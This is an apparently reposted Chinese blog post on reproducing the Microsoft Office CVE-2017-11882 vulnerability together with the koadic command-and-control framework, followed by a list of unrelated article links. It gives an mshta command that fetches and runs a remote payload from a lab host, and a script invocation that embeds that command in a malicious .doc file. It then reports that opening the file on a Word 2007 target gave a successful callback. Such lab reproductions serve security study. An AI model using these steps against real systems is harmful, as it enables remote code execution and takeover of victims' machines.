CVE-2017-11882复现配合koadic - 润新知

CVE-2017-11882复现配合koadic
项目地址：https://github.com/iBearcat/CVE-2017-11882

首先开启koadic，然后配置一下

复制这句代码
```
mshta http://192.168.220.132:9999/dHem0
```
然后生成doc文件
```
┌─[root@sch01ar]─[/sch01ar/CVE-2017-11882]
└──╼ #python Command_CVE-2017-11882.py -c "mshta http://192.168.220.132:9999/dHem0" -o sch01ar.doc
```
注：命令长度不能超过43 bytes

然后拿到靶机里测试

打开文件(word测试版本为2007)

目标主机反弹成功
相关阅读:
c#操作ElasticSearch5详解
 消息推送服务
 Elasticsearch5.0.1 + Kibana5.0.1 + IK 5.0.1
C#使用ES
C# 开发人员的函数式编程
 Swagger文档转Word
Spring Security OAuth2 Demo -- good
is not eligible for getting processed by all BeanPostProcessors
成功都一样，失败各不同；失败的项目也许值得你警醒
 java.exe进程来源排查录
原文地址：https://www.cnblogs.com/sch01ar/p/7875726.html

Copyright © 2020-2023 润新知